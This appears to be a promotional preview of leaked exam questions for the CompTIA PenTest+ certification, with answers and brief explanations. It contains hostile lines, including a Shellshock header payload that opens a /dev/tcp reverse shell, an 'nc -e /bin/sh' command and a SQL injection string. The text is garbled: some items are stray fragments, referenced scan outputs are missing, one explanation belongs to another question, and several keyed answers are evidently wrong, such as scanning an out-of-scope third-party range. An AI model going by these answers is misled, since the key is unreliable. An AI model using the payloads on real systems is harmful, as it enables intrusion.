CompTIA PT0-002 Exam Updated Material

Text Material Preview

PT0-002
Exam Name: CompTIA PenTest+ Certification Exam
Full version: 253 Q&As
Full version of PT0-002 Dumps
Share some PT0-002 exam dumps below.
1. A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen
from the target machine.
Which of the following MOST likely caused the attack to fail?
A. The injection was too slow.
B. The DNS information was incorrect.
 1 / 18
https://www.certqueen.com/PT0-002.html
C. The DNS cache was not refreshed.
D. The client did not receive a trusted response.
Answer: C
2. 0.1: inverse host lookup failed: Unknown host (UNKNOWN) [10.0.0.1] 22 (ssh) open
(UNKNOWN) [10.0.0.1] 23 (telnet) : Connection timed out
https://unix.stackexchange.com/questions/589561/what-is-nc-z-used-for
3. Which of the following describes the reason why a penetration tester would run the command
sdelete mimikatz. * on a Windows server that the tester compromised?
A. To remove hash-cracking registry entries
B. To remove the tester-created Mimikatz account
C. To remove tools from the server
D. To remove a reverse shell from the system
Answer: B
4. A penetration tester recently completed a review of the security of a core network device
within a corporate environment.
The key findings are as follows:
• The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
• Network management interfaces are available on the production network.
• An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final
report? (Choose two.)
 2 / 18
A. Enforce enhanced password complexity requirements.
B. Disable or upgrade SSH daemon.
C. Disable HTTP/301 redirect configuration.
D. Create an out-of-band network for management.
E. Implement a better method for authentication.
F. Eliminate network management and control interfaces.
Answer: C,D
5. Which of the following tools would BEST allow a penetration tester to capture wireless
handshakes to reveal a Wi-Fi password from a Windows machine?
A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng
Answer: D
Explanation:
The BEST tool to capture wireless handshakes to reveal a Wi-Fi password from a Windows
machine is Aircrack-ng. Aircrack-ng is a suite of tools used to assess the security of wireless
networks. It starts by capturing wireless network packets [1], then attempts to crack the network
password by analyzing them [1]. Aircrack-ng supports FMS, PTW, and other attack types, and
can also be used to generate keystreams for WEP and WPA-PSK encryption. It is capable of
running on Windows, Linux, and Mac OS X.
The BEST tool to capture wireless handshakes to reveal a Wi-Fi password from a Windows
machine is Aircrack-ng. Aircrack-ng is a suite of tools used to assess the security of wireless
networks. It starts by capturing wireless network packets [1], then attempts to crack the network
password by analyzing them [1]. Aircrack-ng supports FMS, PTW, and other attack types, and
can also be used to generate keystreams for WEP and WPA-PSK encryption. It is capable of
running on Windows, Linux, and Mac OS X.
6. Reflected XSS - Input sanitization (<> ...)
7. A penetration tester needs to access a building that is guarded by locked gates, a security
team, and cameras.
Which of the following is a technique the tester can use to gain access to the IT framework
without being detected?
A. Pick a lock.
B. Disable the cameras remotely.
 3 / 18
C. Impersonate a package delivery worker.
D. Send a phishing email.
Answer: C
8. A penetration tester has obtained root access to a Linux-based file server and would like to
maintain persistence after reboot.
Which of the following techniques would BEST support this objective?
A. Create a one-shot system service to establish a reverse shell.
B. Obtain /etc/shadow and brute force the root password.
C. Run the nc -e /bin/sh <...> command.
D. Move laterally to create a user account on LDAP
Answer: A
Explanation:
https://hosakacorp.net/p/systemd-user.html
9. A penetration tester needs to perform a vulnerability scan against a web server.
Which of the following tools is the tester MOST likely to choose?
A. Nmap
B. Nikto
C. Cain and Abel
D. Ethercap
Answer: B
Explanation:
https://hackertarget.com/nikto-website-scanner/
10. A penetration tester ran an Nmap scan on an Internet-facing network device with the CF
option and found a few open ports. To further enumerate, the tester ran another scan using the
following command:
nmap CO CA CsS Cp- 100.100.100.50
Nmap returned that all 65,535 ports were filtered.
Which of the following MOST likely occurred on the second scan?
A. A firewall or IPS blocked the scan.
B. The penetration tester used unsupported flags.
C. The edge network device was disconnected.
D. The scan returned ICMP echo replies.
Answer: A
 4 / 18
Explanation:
Reference: https://phoenixnap.com/kb/nmap-scan-open-ports
11. A penetration tester is able to use a command injection vulnerability in a web application to
get a reverse shell on a system.
After running a few commands, the tester runs the following:
python -c 'import pty; pty.spawn("/bin/bash")'
Which of the following actions Is the penetration tester performing?
A. Privilege escalation
B. Upgrading the shell
C. Writing a script for persistence
D. Building a bind shell
Answer: B
12. A red team completed an engagement and provided the following example in the report to
describe how the team gained access to a web server:
x’ OR role LIKE '%admin%
Which of the following should be recommended to remediate this vulnerability?
A. Multifactor authentication
B. Encrypted communications
C. Secure software development life cycle
D. Parameterized queries
Answer: D
13. Which of the following assessment methods is MOST likely to cause harm to an ICS
environment?
A. Active scanning
B. Ping sweep
C. Protocol reversing
D. Packet analysis
Answer: A
14. Which of the following provides an exploitation suite with payload modules that cover the
broadest range of target system types?
A. Nessus
B. Metasploit
 5 / 18
C. Burp Suite
D. Ethercap
Answer: B
15. A Chief Information Security Officer wants to evaluate the security of the company's e-
commerce application.
Which of the following tools should a penetration tester use FIRST to obtain relevant information
from the application without triggering alarms?
A. SQLmap
B. DirBuster
C. w3af
D. OWASP ZAP
Answer: C
Explanation:
W3AF, the Web Application Attack and Audit Framework, is an open source web application
security scanner that includes directory and filename bruteforcing in its list of capabilities.
16. A penetration tester receives the following results from an Nmap scan:
Which of the following OSs is the target MOST likely running?
A. CentOS
B. Arch Linux
 6 / 18
C. Windows Server
D. Ubuntu
Answer: C
17. A penetration tester discovers that a web server within the scope of the engagement has
already been compromised with a backdoor.
Which of the following should the penetration tester do NEXT?
A. Forensically acquire the backdoor Trojan and perform attribution
B. Utilize the backdoor in support of the engagement
C. Continue the engagement and include the backdoor finding in the final report
D. Inform the customer immediately about the backdoor
Answer: D
18. A security firm is discussing the results of a penetration test with the client. Based on the
findings, the client wants to focus the remaining time on a critical network segment.
Which of the following BEST describes the action takingplace?
A. Maximizing the likelihood of finding vulnerabilities
B. Reprioritizing the goals/objectives
C. Eliminating the potential for false positives
D. Reducing the risk to the client environment
Answer: B
Explanation:
Goal Reprioritization Have the goals of the assessment changed? Has any new information
been found that might affect the goal or desired end state? I would also agree with A, because
by goal reprioritization you are more likely to find vulnerabilities in this specific segment of
critical network, but it is a side effect of goal reprioritization.
19. A penetration tester completed an assessment, removed all artifacts and accounts created
during the test, and presented the findings to the client.
Which of the following happens NEXT?
A. The penetration tester conducts a retest.
B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.
Answer: C
 7 / 18
20. A penetration tester has gained access to a network device that has a previously unknown
IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-
party supplier.
Which of the following is the BEST action for the penetration tester to take?
A. Utilize the tunnel as a means of pivoting to other internal devices.
B. Disregard the IP range, as it is out of scope.
C. Stop the assessment and inform the emergency contact.
D. Scan the IP range for additional systems to exploit.
Answer: D
21. An exploit developer is coding a script that submits a very large number of small requests to
a web server until the server is compromised. The script must examine each response received
and compare the data to a large number of strings to determine which data to submit next.
Which of the following data structures should the exploit developer use to make the string
comparison and determination as efficient as possible?
A. A list
B. A tree
C. A dictionary
D. An array
Answer: C
Explanation:
data structures are used to store data in an organized form, and some data structures are more
efficient and suitable for certain operations than others. For example, hash tables, skip lists and
jump lists are some dictionary data structures that can insert and access elements efficiently3.
For string comparison, there are different algorithms that can measure how similar two strings
are, such as Levenshtein distance, Hamming distance or Jaccard similarity4. Some of these
algorithms can be implemented using data structures such as arrays or hashtables 5.
22. Running a vulnerability scanner on a hybrid network segment that includes general IT
servers and industrial control systems:
A. will reveal vulnerabilities in the Modbus protocol.
B. may cause unintended failures in control systems.
C. may reduce the true positive rate of findings.
D. will create a denial-of-service condition on the IP networks.
Answer: B
Explanation:
 8 / 18
Reference: https://www.hsdl.org/?view&did=7262
23. A company obtained permission for a vulnerability scan from its cloud service provider and
now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?
A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure
C. Whether the client's employees are trained properly to use the platform
D. Whether the cloud applications were developed using a secure SDLC
Answer: A
24. A penetration tester wants to test a list of common passwords against the SSH daemon on
a network device.
Which of the following tools would be BEST to use for this purpose?
A. Hashcat
B. Mimikatz
C. Patator
D. John the Ripper
Answer: C
Explanation:
https://www.kali.org/tools/patator/
25. A penetration tester was able to compromise a web server and move laterally into a Linux
web server. The tester now wants to determine the identity of the last user who signed in to the
web server.
Which of the following log files will show this activity?
A. /var/log/messages
B. /var/log/last_user
C. /var/log/user_log
D. /var/log/lastlog
Answer: D
Explanation:
The /var/log/lastlog file is a log file that stores information about the last user to sign in to the
server. This file stores information such as the username, IP address, and timestamp of the last
user to sign in to the server. It can be used by a penetration tester to determine the identity of
the last user who signed in to the web server, which can be helpful in identifying the user who
 9 / 18
may have set up the backdoors and other malicious activities.
26. A consultant just performed a SYN scan of all the open ports on a remote host and now
needs to remotely identify the type of services that are running on the host.
Which of the following is an active reconnaissance tool that would be BEST to use to
accomplish this task?
A. tcpdump
B. Snort
C. Nmap
D. Netstat
E. Fuzzer
Answer: C
27. Which of the following situations would require a penetration tester to notify the emergency
contact for the engagement?
A. The team exploits a critical server within the organization.
B. The team exfiltrates PII or credit card data from the organization.
C. The team loses access to the network remotely.
D. The team discovers another actor on a system on the network.
Answer: D
28. A penetration tester found the following valid URL while doing a manual assessment of a
web application: http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a
vulnerability in this URL?
A. SQLmap
B. Nessus
C. Nikto
D. DirBuster
Answer: B
29. Penetration tester has discovered an unknown Linux 64-bit executable binary.
Which of the following tools would be BEST to use to analyze this issue?
A. Peach
B. WinDbg
C. GDB
 10 / 18
D. OllyDbg
Answer: C
Explanation:
OLLYDBG, WinDBG, and IDA are all debugging tools that support Windows environments.
GDB is a Linuxspecific debugging tool.
30. A penetration tester has extracted password hashes from the lsass.exe memory process.
Which of the following should the tester perform NEXT to pass the hash and provide
persistence with the newly acquired credentials?
A. Use Patator to pass the hash and Responder for persistence.
B. Use Hashcat to pass the hash and Empire for persistence.
C. Use a bind shell to pass the hash and WMI for persistence.
D. Use Mimikatz to pass the hash and PsExec for persistence.
Answer: D
Explanation:
Mimikatz is a credential hacking tool that can be used to extract logon passwords from the
LSASS process and pass them to other systems. Once the tester has the hashes, they can then
use PsExec, a command-line utility from Sysinternals, to pass the hash to the remote system
and authenticate with the new credentials. This provides the tester with persistence on the
system, allowing them to access it even after a reboot.
"A penetration tester who has extracted password hashes from the lsass.exe memory process
can use various tools to pass the hash and gain access to other systems using the same
credentials. One tool commonly used for this purpose is Mimikatz, which can extract plaintext
passwords from memory or provide a pass-the-hash capability. After gaining access to a
system, the tester can use various tools for persistence, such as PsExec or WMI." (CompTIA
PenTest+ Study Guide, p. 186)
31. Performing a penetration test against an environment with SCADA devices brings additional
safety risk because the:
A. devices produce more heat and consume more power.
B. devices are obsolete and are no longer available for replacement.
C. protocols are more difficult to understand.
D. devices may cause physical world effects.
Answer: D
Explanation:
"Asignificant issue identified by Wiberg is that using active network scanners, such as Nmap,
 11 / 18
presents a weakness when attempting port recognition or service detection on SCADA devices.
Wiberg states that active tools such as Nmap can use unusual TCP segment data to try and
find available ports. Furthermore, they can open a massive amount of connections with a
specific SCADA device but then fail to close them gracefully." And since SCADA and ICS
devices are designed and implemented with little attention having been paid to the operational
security of these devices and their ability to handle errors or unexpected events, the presence
idle open connections may result into errors that cannot be handled by the devices.
Reference: https://www.hindawi.com/journals/scn/2018/3794603/
32. A Chief Information Security Officer wants a penetration tester to evaluate whether a
recently installed firewall is protecting a subnetwork on which many decades- old legacy
systems are connected. The penetration tester decides to run an OS discovery and a full port
scan to identify all the systems and any potential vulnerability.
Which of the following should the penetration tester consider BEFORE running a scan?
A. The timing of the scan
B. The bandwidth limitations
C. The inventory of assets and versions
D. The type of scan
Answer: C
33. A company has hired a penetration tester to deploy and set up a rogue access point on the
network.
Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
Answer: B
Explanation:
Reference:
https://null-byte.wonderhowto.com/how-to/hack-wi-fi-stealing-wi-fi-passwords-with-evil-twin-
attack-0183880/
https://thecybersecurityman.com/2018/08/11/creating-an-evil-twin-or-fake-access-point-using-
aircrack-ng-and-dnsmasq-part-2-the-attack/
34. Given the following output:
 12 / 18
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?
A. Website scraping
B. Website cloning
C. Domain enumeration
D. URL enumeration
Answer: A
35. A company has recruited a penetration tester to conduct a vulnerability scan over the
network. The test is confirmed to be on a known environment.
Which of the following would be the BEST option to identify a system properly prior to
performing the assessment?
A. Asset inventory
B. DNS records
C. Web-application scan
D. Full scan
Answer: A
36. A penetration tester discovers a vulnerable web server at 10.10.1.1.
The tester then edits a Python script that sends a web exploit and comes across the following
code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”,
“Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in
which the server is being run?
A. exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci id;whoami”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
B. exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& find / -perm -4000”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
C. exploits = {“User-Agent”: “() { ignored;};/bin/sh Ci ps Cef” 0>&1”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
D. exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/10.10.1.1/80” 0>&1”,
 13 / 18
“Accept”: “text/html,application/xhtml+xml,application/xml”}
Answer: A
37. A penetration tester is starting an assessment but only has publicly available information
about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?
A. Partially known environment testing
B. Known environment testing
C. Unknown environment testing
D. Physical environment testing
Answer: C
38. Which of the following tools would be BEST suited to perform a manual web application
security assessment? (Choose two.)
A. OWASP ZAP
B. Nmap
C. Nessus
D. BeEF
E. Hydra
F. Burp Suite
Answer: A,F
39. After running the enum4linux.pl command, a penetration tester received the following
output:
 14 / 18
Which of the following commands should the penetration tester run NEXT?
A. smbspool //192.160.100.56/print$
B. net rpc share -S 192.168.100.56 -U ''
C. smbget //192.168.100.56/web -U ''
D. smbclient //192.168.100.56/web -U '' -N
Answer: D
Explanation:
A vulnerability scan is a type of assessment that helps to identify vulnerabilities in a network or
system. It scans systems for potential vulnerabilities, misconfigurations, and outdated software.
Based on the output from a vulnerability scan, a penetration tester can identify vulnerabilities
that may be exploited to gain access to a system. In this scenario, the output from the
penetration testing tool shows that 100 hosts
contained findings due to improper patch management. This indicates that the vulnerability scan
detected vulnerabilities that could have been prevented through proper patch management.
 15 / 18
Therefore, the most likely test performed by the penetration tester is a vulnerability scan.
40. A penetration tester needs to upload the results of a port scan to a centralized security tool.
Which of the following commands would allow the tester to save the results in an
interchangeable format?
A. nmap -iL results 192.168.0.10-100
B. nmap 192.168.0.10-100 -O > results
C. nmap -A 192.168.0.10-100 -oX results
D. nmap 192.168.0.10-100 | grep "results"
Answer: C
41. A company becomes concerned when the security alarms are triggered during a penetration
test.
Which of the following should the company do NEXT?
A. Halt the penetration test.
B. Contact law enforcement.
C. Deconflict with the penetration tester.
D. Assume the alert is from the penetration test.
Answer: B
42. A security company has been contracted to perform a scoped insider-threat assessment to
try to gain access to the human resources server that houses PII and salary data. The
penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the
assessment?
A. Exploiting a configuration weakness in the SQL database
B. Intercepting outbound TLS traffic
C. Gaining access to hosts by injecting malware into the enterprise-wide update server
D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
E. Establishing and maintaining persistence on the domain controller
Answer: B
43. Which of the following is a rules engine for managing public cloud accounts and resources?
A. Cloud Custodian
B. Cloud Brute
C. Pacu
 16 / 18
D. Scout Suite
Answer: A
Explanation:
Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows
users to define policies to enable a well managed cloud infrastructure, that's both secure and
cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight
and flexible tool, with unified metrics and reporting.
44. A penetration tester captured the following traffic during a web-application test:
Which of the following methods should the tester use to visualize the authorization information
being transmitted?
A. Decode the authorization header using UTF-8.
B. Decrypt the authorization header using bcrypt.
C. Decode the authorization header using Base64.
D. Decrypt the authorization header using AES.
Answer: C
 17 / 18
 
More Hot Exams are available.
350-401 ENCOR Exam Dumps
350-801 CLCOR Exam Dumps
200-301 CCNA Exam Dumps
Powered by TCPDF (www.tcpdf.org)
 18 / 18https://www.certqueen.com/promotion.asp
https://www.certqueen.com/350-401.html
https://www.certqueen.com/350-801.html
https://www.certqueen.com/200-301.html
http://www.tcpdf.org